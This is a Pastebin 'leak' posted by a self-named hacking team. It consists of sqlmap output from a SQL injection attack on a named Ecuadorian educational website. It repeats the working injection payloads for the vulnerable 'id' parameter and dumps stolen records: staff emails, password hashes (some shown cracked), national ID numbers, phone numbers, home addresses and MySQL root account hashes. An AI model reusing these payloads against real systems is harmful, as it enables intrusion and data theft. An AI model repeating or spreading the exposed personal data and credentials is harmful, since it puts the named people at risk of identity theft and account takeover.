Advertisement
Guest User

Untitled

a guest
Apr 15th, 2019
372
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 24.86 KB | None | 0 0
  1. [+] Leak by BlueDragon from @Iznaye [+]
  2.  
  3.  
  4. ██╗███████╗███╗ ██╗ █████╗ ██╗ ██╗███████╗
  5. ██║╚══███╔╝████╗ ██║██╔══██╗╚██╗ ██╔╝██╔════╝
  6. ██║ ███╔╝ ██╔██╗ ██║███████║ ╚████╔╝ █████╗
  7. ██║ ███╔╝ ██║╚██╗██║██╔══██║ ╚██╔╝ ██╔══╝
  8. ██║███████╗██║ ╚████║██║ ██║ ██║ ███████╗
  9. ╚═╝╚══════╝╚═╝ ╚═══╝╚═╝ ╚═╝ ╚═╝ ╚══════╝
  10.  
  11. ###################################
  12. ## ##
  13. ## My Twitter : @bluedragonblue1 ##
  14. ## Our Twitter : @Iznaye ##
  15. ## ##
  16. ## ##
  17. ###################################
  18.  
  19. IZNAYE CYBER TEAM.
  20. Где есть воля, там есть путь.
  21.  
  22. We are : xS1lenc3d | Dext3r | Asahi | Baronnet Noir | Mizaru | zoord | Blue Dragon | AnonWolf
  23.  
  24. Target : http://www.espiritusanto.edu.ec/
  25.  
  26.  
  27.  
  28.  
  29. available databases [12]:
  30.  
  31. [*] bd_sw_uteq
  32. [*] bd_sw_uteq_inf
  33. [*] crevista
  34. [*] devittec
  35. [*] evaladmin
  36. [*] information_schema
  37. [*] mysql
  38. [*] performance_schema
  39. [*] revista
  40. [*] revistaCSYE
  41. [*] web
  42. [*] web_ant
  43.  
  44. sqlmap resumed the following injection point(s) from stored session:
  45. ---
  46. Parameter: id (GET)
  47. Type: boolean-based blind
  48. Title: Boolean-based blind - Parameter replace (original value)
  49. Payload: id=(SELECT (CASE WHEN (3173=3173) THEN 19 ELSE (SELECT 2330 UNION SELECT 8996) END))
  50.  
  51. Type: AND/OR time-based blind
  52. Title: MySQL >= 5.0.12 AND time-based blind
  53. Payload: id=19 AND SLEEP(5)
  54.  
  55. Type: UNION query
  56. Title: Generic UNION query (NULL) - 13 columns
  57. Payload: id=-6370 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171717671,0x4b414d6363564951534549516a4b434963724545627a6d696c496a53664251795248506249704a75,0x71626a6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- GCno
  58. ---
  59. web application technology: Apache
  60. back-end DBMS: MySQL >= 5.0.12
  61. Database: bd_sw_uteq
  62. [23 tables]
  63. +--------------------+
  64. | user |
  65. | auditoria |
  66. | carrera |
  67. | categoria |
  68. | contenido |
  69. | contenidotag |
  70. | empleado |
  71. | eventos |
  72. | jerarquia |
  73. | menu |
  74. | menu_tipo |
  75. | pagina |
  76. | puesto |
  77. | resolucion |
  78. | resolucion_detalle |
  79. | resolucion_tipo |
  80. | slider |
  81. | submenu |
  82. | tag |
  83. | tramite |
  84. | tramite_tipo |
  85. | unidad |
  86. | url |
  87. +--------------------+
  88.  
  89. sqlmap resumed the following injection point(s) from stored session:
  90. ---
  91. Parameter: id (GET)
  92. Type: boolean-based blind
  93. Title: Boolean-based blind - Parameter replace (original value)
  94. Payload: id=(SELECT (CASE WHEN (3173=3173) THEN 19 ELSE (SELECT 2330 UNION SELECT 8996) END))
  95.  
  96. Type: AND/OR time-based blind
  97. Title: MySQL >= 5.0.12 AND time-based blind
  98. Payload: id=19 AND SLEEP(5)
  99.  
  100. Type: UNION query
  101. Title: Generic UNION query (NULL) - 13 columns
  102. Payload: id=-6370 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171717671,0x4b414d6363564951534549516a4b434963724545627a6d696c496a53664251795248506249704a75,0x71626a6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- GCno
  103. ---
  104. web application technology: Apache
  105. back-end DBMS: MySQL >= 5.0.12
  106. Database: bd_sw_uteq
  107. Table: user
  108. [5 entries]
  109. +----+----------+--------------+--------------------------------+--------+--------------------------------------------------------------+
  110. | id | emple_id | rol | email | estado | password |
  111. +----+----------+--------------+--------------------------------+--------+--------------------------------------------------------------+
  112. | 1 | 1 | ROLE_ADMIN | jjcruz@uteq.edu.ec | 1 | $2y$13$DJ5y4DCgFURJ9fDfjdacRuWZ1o1PnFHwIhg5CAeciOn6tlCNvNmnW |
  113. | 2 | 2 | ROLE_FAC | maguirre@uteq.edu.ec | 1 | $2y$13$SexuPaJ6XYhXi7yfnIsA.e6UiObWBbdWMVxRFhRQ7QTPUuOJEWfX2 |
  114. | 3 | 3 | ROLE_RRPP | relacionespublicas@uteq.edu.ec | 1 | $2y$13$AljCW9silb87jmDLOh.Fmuq2r36/Pm17HZKQGUHigK0AePh7MLiUW |
  115. | 4 | 4 | ROLE_FAC | esamaniego@uteq.edu.ec | 1 | $2y$15$kqmlinZ7KBtFU.vh4uCjResx4elBDegJ6htPpLm7w6jrTy3zsPu2e |
  116. | 5 | 2 | ADMIN LOTAIP | maguirre@uteq.edu.ec | 1 | 936aa20735df66b29e0afff8e436df8e (genesis123) |
  117. +----+----------+--------------+--------------------------------+--------+--------------------------------------------------------------+
  118.  
  119. sqlmap resumed the following injection point(s) from stored session:
  120. ---
  121. Parameter: id (GET)
  122. Type: boolean-based blind
  123. Title: Boolean-based blind - Parameter replace (original value)
  124. Payload: id=(SELECT (CASE WHEN (3173=3173) THEN 19 ELSE (SELECT 2330 UNION SELECT 8996) END))
  125.  
  126. Type: AND/OR time-based blind
  127. Title: MySQL >= 5.0.12 AND time-based blind
  128. Payload: id=19 AND SLEEP(5)
  129.  
  130. Type: UNION query
  131. Title: Generic UNION query (NULL) - 13 columns
  132. Payload: id=-6370 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171717671,0x4b414d6363564951534549516a4b434963724545627a6d696c496a53664251795248506249704a75,0x71626a6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- GCno
  133. ---
  134. web application technology: Apache
  135. back-end DBMS: MySQL >= 5.0.12
  136. Database: bd_sw_uteq
  137. Table: empleado
  138. [4 entries]
  139. +----+-----------+---------------+-----------+------------------------+--------+------------+-------------------------+------------+------------------------+----------------------------------------+------------+
  140. | id | unidad_id | apellidos | puesto_id | correo | estado | cedula | nombres | telefono | profesion | direccion | distincion |
  141. +----+-----------+---------------+-----------+------------------------+--------+------------+-------------------------+------------+------------------------+----------------------------------------+------------+
  142. | 1 | 10 | Cruz Garzón | 1 | jc.designjc@gmail.com | 1 | 1205926148 | John Javier | 0987490839 | Ingeniería en Sistemas | Parroquia 7 de Octubre calle 2da. #306 | Ing. |
  143. | 2 | 10 | Aguirre Perez | 2 | maguirre@uteq.edu.ec | 1 | 1204213522 | Margoth de las Mercedes | 0996434284 | Ingeniería en Sistemas | San José Sur calle Quinta | Ing. |
  144. | 3 | 14 | Alarcon Lopez | 2 | jalarcon@uteq.edu.ec | 1 | 1201679162 | Henry Felipe | <blank> | NULL | <blank> | Lcdo. |
  145. | 4 | 16 | Samaniego | 2 | esamaniego@uteq.edu.ec | 1 | 1718071929 | Eduardo | <blank> | Ingeniería en Sistemas | <blank> | Ing. |
  146. +----+-----------+---------------+-----------+------------------------+--------+------------+-------------------------+------------+------------------------+----------------------------------------+------------+
  147.  
  148. sqlmap resumed the following injection point(s) from stored session:
  149. ---
  150. Parameter: id (GET)
  151. Type: boolean-based blind
  152. Title: Boolean-based blind - Parameter replace (original value)
  153. Payload: id=(SELECT (CASE WHEN (3173=3173) THEN 19 ELSE (SELECT 2330 UNION SELECT 8996) END))
  154.  
  155. Type: AND/OR time-based blind
  156. Title: MySQL >= 5.0.12 AND time-based blind
  157. Payload: id=19 AND SLEEP(5)
  158.  
  159. Type: UNION query
  160. Title: Generic UNION query (NULL) - 13 columns
  161. Payload: id=-6370 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171717671,0x4b414d6363564951534549516a4b434963724545627a6d696c496a53664251795248506249704a75,0x71626a6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- GCno
  162. ---
  163. web application technology: Apache
  164. back-end DBMS: MySQL >= 5.0.12
  165. Database: bd_sw_uteq_inf
  166. [10 tables]
  167. +------------------+
  168. | user |
  169. | archivo |
  170. | archivocategoria |
  171. | inflotaip |
  172. | lotaip |
  173. | qr |
  174. | rc |
  175. | rol |
  176. | rolrubro |
  177. | sublotaip |
  178. +------------------+
  179.  
  180. sqlmap resumed the following injection point(s) from stored session:
  181. ---
  182. Parameter: id (GET)
  183. Type: boolean-based blind
  184. Title: Boolean-based blind - Parameter replace (original value)
  185. Payload: id=(SELECT (CASE WHEN (3173=3173) THEN 19 ELSE (SELECT 2330 UNION SELECT 8996) END))
  186.  
  187. Type: AND/OR time-based blind
  188. Title: MySQL >= 5.0.12 AND time-based blind
  189. Payload: id=19 AND SLEEP(5)
  190.  
  191. Type: UNION query
  192. Title: Generic UNION query (NULL) - 13 columns
  193. Payload: id=-6370 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171717671,0x4b414d6363564951534549516a4b434963724545627a6d696c496a53664251795248506249704a75,0x71626a6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- GCno
  194. ---
  195. web application technology: Apache
  196. back-end DBMS: MySQL >= 5.0.12
  197. Database: bd_sw_uteq_inf
  198. Table: user
  199. [3 entries]
  200. +----+-----------+--------+------------+---------+------------------------------------------+
  201. | id | apellidos | correo | cedula | nombres | password |
  202. +----+-----------+--------+------------+---------+------------------------------------------+
  203. | 1 | Robles | NULL | 123456 | Genesis | 827ccb0eea8a706c4c34a16891f84e7b (12345) |
  204. | 2 | Aguirre | NULL | 1204213522 | Margoth | f854aec64aea564d9ff9266a5862454e |
  205. | 3 | Palma | NULL | 1303885303 | Pablo | 827ccb0eea8a706c4c34a16891f84e7b (12345) |
  206. +----+-----------+--------+------------+---------+------------------------------------------+
  207.  
  208. sqlmap resumed the following injection point(s) from stored session:
  209. ---
  210. Parameter: id (GET)
  211. Type: boolean-based blind
  212. Title: Boolean-based blind - Parameter replace (original value)
  213. Payload: id=(SELECT (CASE WHEN (3173=3173) THEN 19 ELSE (SELECT 2330 UNION SELECT 8996) END))
  214.  
  215. Type: AND/OR time-based blind
  216. Title: MySQL >= 5.0.12 AND time-based blind
  217. Payload: id=19 AND SLEEP(5)
  218.  
  219. Type: UNION query
  220. Title: Generic UNION query (NULL) - 13 columns
  221. Payload: id=-6370 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171717671,0x4b414d6363564951534549516a4b434963724545627a6d696c496a53664251795248506249704a75,0x71626a6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- GCno
  222. ---
  223. web application technology: Apache
  224. back-end DBMS: MySQL >= 5.0.12
  225. Database: evaladmin
  226. [17 tables]
  227. +--------------------------+
  228. | areas |
  229. | cargos |
  230. | competencias_tecnicas |
  231. | competencias_universales |
  232. | conocimientos |
  233. | evaluaciones |
  234. | evaluador |
  235. | evaluados |
  236. | indicador_gestion |
  237. | indicador_gestion2 |
  238. | nivelcompetencia |
  239. | nivelconocimiento |
  240. | nivelfrecuencia |
  241. | observaciones |
  242. | tbusr |
  243. | titulos |
  244. | trabajo_equipo |
  245. +--------------------------+
  246.  
  247. sqlmap resumed the following injection point(s) from stored session:
  248. ---
  249. Parameter: id (GET)
  250. Type: boolean-based blind
  251. Title: Boolean-based blind - Parameter replace (original value)
  252. Payload: id=(SELECT (CASE WHEN (3173=3173) THEN 19 ELSE (SELECT 2330 UNION SELECT 8996) END))
  253.  
  254. Type: AND/OR time-based blind
  255. Title: MySQL >= 5.0.12 AND time-based blind
  256. Payload: id=19 AND SLEEP(5)
  257.  
  258. Type: UNION query
  259. Title: Generic UNION query (NULL) - 13 columns
  260. Payload: id=-6370 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171717671,0x4b414d6363564951534549516a4b434963724545627a6d696c496a53664251795248506249704a75,0x71626a6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- GCno
  261. ---
  262. web application technology: Apache
  263. back-end DBMS: MySQL >= 5.0.12
  264. Database: mysql
  265. [30 tables]
  266. +---------------------------+
  267. | user |
  268. | column_stats |
  269. | columns_priv |
  270. | db |
  271. | event |
  272. | func |
  273. | general_log |
  274. | gtid_slave_pos |
  275. | help_category |
  276. | help_keyword |
  277. | help_relation |
  278. | help_topic |
  279. | host |
  280. | index_stats |
  281. | innodb_index_stats |
  282. | innodb_table_stats |
  283. | plugin |
  284. | proc |
  285. | procs_priv |
  286. | proxies_priv |
  287. | roles_mapping |
  288. | servers |
  289. | slow_log |
  290. | table_stats |
  291. | tables_priv |
  292. | time_zone |
  293. | time_zone_leap_second |
  294. | time_zone_name |
  295. | time_zone_transition |
  296. | time_zone_transition_type |
  297. +---------------------------+
  298.  
  299. sqlmap resumed the following injection point(s) from stored session:
  300. ---
  301. Parameter: id (GET)
  302. Type: boolean-based blind
  303. Title: Boolean-based blind - Parameter replace (original value)
  304. Payload: id=(SELECT (CASE WHEN (3173=3173) THEN 19 ELSE (SELECT 2330 UNION SELECT 8996) END))
  305.  
  306. Type: AND/OR time-based blind
  307. Title: MySQL >= 5.0.12 AND time-based blind
  308. Payload: id=19 AND SLEEP(5)
  309.  
  310. Type: UNION query
  311. Title: Generic UNION query (NULL) - 13 columns
  312. Payload: id=-6370 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171717671,0x4b414d6363564951534549516a4b434963724545627a6d696c496a53664251795248506249704a75,0x71626a6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- GCno
  313. ---
  314. web application technology: Apache
  315. back-end DBMS: MySQL >= 5.0.12
  316. Database: mysql
  317. Table: servers
  318. [0 entries]
  319. +----+------+------+-------+--------+---------+----------+----------+-------------+
  320. | Db | Host | Port | Owner | Socket | Wrapper | Username | Password | Server_name |
  321. +----+------+------+-------+--------+---------+----------+----------+-------------+
  322. +----+------+------+-------+--------+---------+----------+----------+-------------+
  323.  
  324. sqlmap resumed the following injection point(s) from stored session:
  325. ---
  326. Parameter: id (GET)
  327. Type: boolean-based blind
  328. Title: Boolean-based blind - Parameter replace (original value)
  329. Payload: id=(SELECT (CASE WHEN (3173=3173) THEN 19 ELSE (SELECT 2330 UNION SELECT 8996) END))
  330.  
  331. Type: AND/OR time-based blind
  332. Title: MySQL >= 5.0.12 AND time-based blind
  333. Payload: id=19 AND SLEEP(5)
  334.  
  335. Type: UNION query
  336. Title: Generic UNION query (NULL) - 13 columns
  337. Payload: id=-6370 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171717671,0x4b414d6363564951534549516a4b434963724545627a6d696c496a53664251795248506249704a75,0x71626a6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- GCno
  338. ---
  339. web application technology: Apache
  340. back-end DBMS: MySQL >= 5.0.12
  341. Database: mysql
  342. Table: user
  343. [9 entries]
  344. +-----------+------------------+---------+---------+-------------------------------------------+----------+-----------+-----------+------------+------------+------------+------------+------------+------------+-------------+-------------+-------------+-------------+-------------+-------------+-------------+-------------+--------------+--------------+--------------+--------------+--------------+--------------+---------------+---------------+----------------+-----------------+-----------------+-----------------+------------------+------------------+------------------+------------------+------------------+--------------------+--------------------+---------------------+----------------------+-----------------------+-----------------------+------------------------+
  345. | Host | User | plugin | is_role | Password | ssl_type | Drop_priv | File_priv | Grant_priv | Super_priv | Alter_priv | ssl_cipher | Index_priv | Event_priv | Create_priv | max_updates | Reload_priv | Delete_priv | Insert_priv | x509_issuer | Select_priv | Update_priv | Execute_priv | default_role | Show_db_priv | x509_subject | Process_priv | Trigger_priv | Shutdown_priv | max_questions | Show_view_priv | max_connections | Repl_slave_priv | References_priv | Repl_client_priv | Create_user_priv | password_expired | Create_view_priv | Lock_tables_priv | Alter_routine_priv | max_statement_time | Create_routine_priv | max_user_connections | authentication_string | Create_tmp_table_priv | Create_tablespace_priv |
  346. +-----------+------------------+---------+---------+-------------------------------------------+----------+-----------+-----------+------------+------------+------------+------------+------------+------------+-------------+-------------+-------------+-------------+-------------+-------------+-------------+-------------+--------------+--------------+--------------+--------------+--------------+--------------+---------------+---------------+----------------+-----------------+-----------------+-----------------+------------------+------------------+------------------+------------------+------------------+--------------------+--------------------+---------------------+----------------------+-----------------------+-----------------------+------------------------+
  347. | localhost | root | <blank> | N | *2BD35F98BA49ACCA357FB3A00A50E52DCB8EF8AB | <blank> | Y | Y | Y | Y | Y | <blank> | Y | Y | Y | 0 | Y | Y | Y | <blank> | Y | Y | Y | <blank> | Y | <blank> | Y | Y | Y | 0 | Y | 0 | Y | Y | Y | Y | N | Y | Y | Y | 0.000000 | Y | 0 | <blank> | Y | Y |
  348. | uteq | root | <blank> | N | *2BD35F98BA49ACCA357FB3A00A50E52DCB8EF8AB | <blank> | Y | Y | Y | Y | Y | <blank> | Y | Y | Y | 0 | Y | Y | Y | <blank> | Y | Y | Y | <blank> | Y | <blank> | Y | Y | Y | 0 | Y | 0 | Y | Y | Y | Y | N | Y | Y | Y | 0.000000 | Y | 0 | <blank> | Y | Y |
  349. | 127.0.0.1 | root | <blank> | N | *2BD35F98BA49ACCA357FB3A00A50E52DCB8EF8AB | <blank> | Y | Y | Y | Y | Y | <blank> | Y | Y | Y | 0 | Y | Y | Y | <blank> | Y | Y | Y | <blank> | Y | <blank> | Y | Y | Y | 0 | Y | 0 | Y | Y | Y | Y | N | Y | Y | Y | 0.000000 | Y | 0 | <blank> | Y | Y |
  350. | ::1 | root | <blank> | N | *2BD35F98BA49ACCA357FB3A00A50E52DCB8EF8AB | <blank> | Y | Y | Y | Y | Y | <blank> | Y | Y | Y | 0 | Y | Y | Y | <blank> | Y | Y | Y | <blank> | Y | <blank> | Y | Y | Y | 0 | Y | 0 | Y | Y | Y | Y | N | Y | Y | Y | 0.000000 | Y | 0 | <blank> | Y | Y |
  351. | localhost | stwuteq | <blank> | N | *A1FB2C05A755AFC81B3060B2D0534085FD139B6D | <blank> | N | N | N | N | N | <blank> | N | N | N | 0 | N | Y | Y | <blank> | Y | Y | N | <blank> | N | <blank> | N | N | N | 0 | N | 0 | N | N | N | N | N | N | N | N | 0.000000 | N | 0 | <blank> | N | N |
  352. | localhost | debian-sys-maint | <blank> | N | *574BC1B322B497F5D29C1F221237657118749AE6 | <blank> | Y | Y | Y | Y | Y | <blank> | Y | Y | Y | 0 | Y | Y | Y | <blank> | Y | Y | Y | <blank> | Y | <blank> | Y | Y | Y | 0 | Y | 0 | Y | Y | Y | Y | N | Y | Y | Y | 0.000000 | Y | 0 | <blank> | Y | N |
  353. | % | root | <blank> | N | *2BD35F98BA49ACCA357FB3A00A50E52DCB8EF8AB | <blank> | Y | Y | Y | Y | Y | <blank> | Y | Y | Y | 0 | Y | Y | Y | <blank> | Y | Y | Y | <blank> | Y | <blank> | Y | Y | Y | 0 | Y | 0 | Y | Y | Y | Y | N | Y | Y | Y | 0.000000 | Y | 0 | <blank> | Y | Y |
  354. | % | movil | <blank> | N | *68CF846C58062BE7DBF65F7A1088C189A7B5ED11 | <blank> | N | N | N | N | N | <blank> | N | N | N | 0 | N | N | N | <blank> | Y | N | N | <blank> | N | <blank> | N | N | N | 0 | N | 0 | N | N | N | N | N | N | N | N | 0.000000 | N | 0 | <blank> | N | N |
  355. | % | czambrano | <blank> | N | *D9E6CF1AED7BE29E95B318F1CA4A8DD081650F24 | <blank> | N | N | N | N | N | <blank> | N | N | N | 0 | N | N | N | <blank> | N | N | N | <blank> | N | <blank> | N | N | N | 0 | N | 0 | N | N | N | N | N | N | N | N | 0.000000 | N | 0 | <blank> | N | N |
  356. +-----------+------------------+---------+---------+-------------------------------------------+----------+-----------+-----------+------------+------------+------------+------------+------------+------------+-------------+-------------+-------------+-------------+-------------+-------------+-------------+-------------+--------------+--------------+--------------+--------------+--------------+--------------+---------------+---------------+----------------+-----------------+-----------------+-----------------+------------------+------------------+------------------+------------------+------------------+--------------------+--------------------+---------------------+----------------------+-----------------------+-----------------------+------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement